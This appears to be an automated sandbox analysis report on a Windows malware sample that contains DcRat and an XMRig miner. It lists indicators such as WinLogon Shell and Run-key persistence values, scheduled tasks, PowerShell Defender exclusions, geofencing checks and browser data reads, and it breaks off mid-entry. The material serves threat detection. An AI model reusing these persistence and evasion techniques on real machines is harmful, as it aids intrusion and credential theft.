Analysis
-
max time kernel
25s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
21-07-2024 20:24
Behavioral task
behavioral1
Sample
2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe
Resource
win10v2004-20240709-en
General
-
Target
2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe
-
Size
9.5MB
-
MD5
4050f2027e946d524e3a1078a6cd5419
-
SHA1
698f02a2826e7d6ecfebf37b04f0231c904133eb
-
SHA256
2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab
-
SHA512
fed614ebd8197c8809d32e0437dd49fd87640d3fbe0ae806479e79f2480975e404306821c43e726b55d17c02298bb088175ee079bc88d8a8fe942f3d4cd9afab
-
SSDEEP
196608:HE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5nQ:HE9B0OjrdLK4J/FQ
Malware Config
Signatures
-
DcRat 64 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2976 schtasks.exe 3280 schtasks.exe 4460 schtasks.exe 5988 schtasks.exe 3000 schtasks.exe 3816 schtasks.exe 3912 schtasks.exe 3712 schtasks.exe 1808 schtasks.exe 5980 schtasks.exe 2788 schtasks.exe 3976 schtasks.exe 3184 schtasks.exe 2104 schtasks.exe 5540 schtasks.exe 6820 schtasks.exe 6272 schtasks.exe 7160 schtasks.exe 5392 schtasks.exe 556 schtasks.exe 2136 schtasks.exe 4912 schtasks.exe 4772 schtasks.exe 888 schtasks.exe 2444 schtasks.exe 2844 schtasks.exe 548 schtasks.exe 5472 schtasks.exe 6332 schtasks.exe 3532 schtasks.exe 3776 schtasks.exe 4408 schtasks.exe 1540 schtasks.exe 2572 schtasks.exe 1956 schtasks.exe 1148 schtasks.exe 5724 schtasks.exe 2636 schtasks.exe 7132 schtasks.exe 7096 schtasks.exe 6040 schtasks.exe 5664 schtasks.exe 3944 schtasks.exe 5132 schtasks.exe 4564 schtasks.exe 5520 schtasks.exe 6020 schtasks.exe 1568 schtasks.exe 2788 schtasks.exe 3960 schtasks.exe 32 schtasks.exe 1568 schtasks.exe 5060 schtasks.exe 6084 schtasks.exe 7124 schtasks.exe 60 schtasks.exe 4544 schtasks.exe 5856 schtasks.exe 2632 schtasks.exe 1592 schtasks.exe 6424 schtasks.exe 3224 schtasks.exe 6628 schtasks.exe 6064 schtasks.exe -
Modifies WinLogon for persistence 2 TTPs 15 IoCs
Processes:
Refcrt.exeRefcrt.exeRoblox.exesddsfsdf.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\", \"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\", \"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\", \"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\", \"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\", \"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\", \"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\msiexec.exe\", \"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\", \"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\", \"C:\\Users\\All Users\\Templates\\msiexec.exe\", \"C:\\Users\\Public\\smss.exe\", \"C:\\winNet\\conhost.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\xdwdSublime Text.exe" sddsfsdf.exe -
Process spawned unexpected child process 42 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1540 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3912 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5060 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3960 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4912 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2788 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4408 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1808 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3712 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1568 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3280 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2976 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 888 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1148 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2632 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3776 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3944 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1592 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 32 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2844 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2572 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3184 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4772 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3532 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3976 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 556 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2104 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2444 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 548 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 60 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6040 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3816 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5472 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4564 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3224 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1568 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5132 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1956 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2788 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5520 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5540 2568 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4544 2568 schtasks.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Youtube.exe dcrat behavioral2/memory/4476-19-0x0000000000400000-0x0000000000D8F000-memory.dmp dcrat C:\Users\Admin\AppData\Local\Temp\Result.exe dcrat behavioral2/memory/2408-61-0x0000000000400000-0x0000000000CC7000-memory.dmp dcrat C:\Users\Admin\AppData\Local\Temp\solara.exe dcrat behavioral2/memory/4912-90-0x0000000000400000-0x000000000069B000-memory.dmp dcrat C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe dcrat behavioral2/memory/3112-108-0x0000000000890000-0x0000000000A14000-memory.dmp dcrat -
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/5176-1153-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5176-1154-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5176-1182-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5176-1185-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5176-1186-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5176-1184-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5176-1183-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5176-1597-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5176-2396-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5176-2408-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/5176-2405-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 33 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3288 powershell.exe 1952 powershell.exe 2140 powershell.exe 4776 powershell.exe 3140 powershell.exe 2572 powershell.exe 1756 powershell.exe 1808 powershell.exe 5972 powershell.exe 1956 powershell.exe 2432 powershell.exe 3224 powershell.exe 764 powershell.exe 1148 powershell.exe 2632 powershell.exe 3024 powershell.exe 3912 powershell.exe 5124 powershell.exe 5968 powershell.exe 3452 powershell.exe 2532 powershell.exe 2032 powershell.exe 3772 powershell.exe 5896 powershell.exe 3984 powershell.exe 5160 powershell.exe 6028 powershell.exe 6112 powershell.exe 2060 powershell.exe 5564 powershell.exe 2604 powershell.exe 5184 powershell.exe 3756 powershell.exe -
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
.NET Reactor proctector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Youtube.exe net_reactor behavioral2/memory/4476-19-0x0000000000400000-0x0000000000D8F000-memory.dmp net_reactor behavioral2/memory/2408-61-0x0000000000400000-0x0000000000CC7000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ComContainerbrowserRefRuntime.exeRoblox.exeRefcrt.exeYoutube.exeDCRatBuild.exeFrage build.exesolara.exeWScript.exeRefcrt.exeWScript.exe2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exeWScript.exeResult.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation ComContainerbrowserRefRuntime.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Roblox.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Refcrt.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Youtube.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation DCRatBuild.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Frage build.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation solara.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Refcrt.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Result.exe -
Executes dropped EXE 13 IoCs
Processes:
Youtube.exesddsfsdf.exeResult.exeDCRatBuild.exeBloxstrap.exeFrage build.exeSolaraBootstrapper.exesolara.exeRefcrt.exeRefcrt.execmd.exeComContainerbrowserRefRuntime.exeRoblox.exepid process 2408 Youtube.exe 4048 sddsfsdf.exe 4912 Result.exe 3604 DCRatBuild.exe 1156 Bloxstrap.exe 3600 Frage build.exe 2616 SolaraBootstrapper.exe 2632 solara.exe 3112 Refcrt.exe 4952 Refcrt.exe 4540 cmd.exe 5312 ComContainerbrowserRefRuntime.exe 4168 Roblox.exe -
Loads dropped DLL 64 IoCs
Processes:
MsiExec.exeMsiExec.execonhost.exepowershell.exeRefcrt.exepowershell.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepowershell.exepowershell.exepowershell.execmd.exeComContainerbrowserRefRuntime.exeRoblox.exeWmiApSrv.exeschtasks.exeschtasks.exeschtasks.execsc.execsc.execsc.execsc.execsc.execsc.execsc.execsc.execsc.execsc.execsc.exeschtasks.exeschtasks.exeschtasks.exepid process 2416 MsiExec.exe 2416 MsiExec.exe 4856 MsiExec.exe 5760 4856 MsiExec.exe 4856 MsiExec.exe 5836 conhost.exe 5180 5564 powershell.exe 4952 Refcrt.exe 1460 4232 5160 powershell.exe 6040 schtasks.exe 3816 schtasks.exe 5472 schtasks.exe 4564 schtasks.exe 3224 schtasks.exe 1568 schtasks.exe 3740 5060 228 3912 powershell.exe 2604 powershell.exe 3772 powershell.exe 4540 cmd.exe 4136 5312 ComContainerbrowserRefRuntime.exe 5600 5760 5176 4168 Roblox.exe 3824 WmiApSrv.exe 3776 5132 schtasks.exe 1956 schtasks.exe 2788 schtasks.exe 6056 3060 csc.exe 3716 2576 1652 csc.exe 4972 5952 csc.exe 1592 5224 csc.exe 2860 5900 csc.exe 5352 2040 csc.exe 3112 5280 csc.exe 5680 5592 csc.exe 5800 4732 csc.exe 5772 5432 csc.exe 5228 5892 csc.exe 5520 schtasks.exe 5540 schtasks.exe 4544 schtasks.exe 4564 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 29 IoCs
Processes:
Refcrt.exeRefcrt.exeRoblox.exesddsfsdf.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\winNet\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\DriversavessessionDlldhcp\\cmd.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Public\\smss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\All Users\\Templates\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\winNet\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Public\\smss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Recovery\\WindowsRE\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) 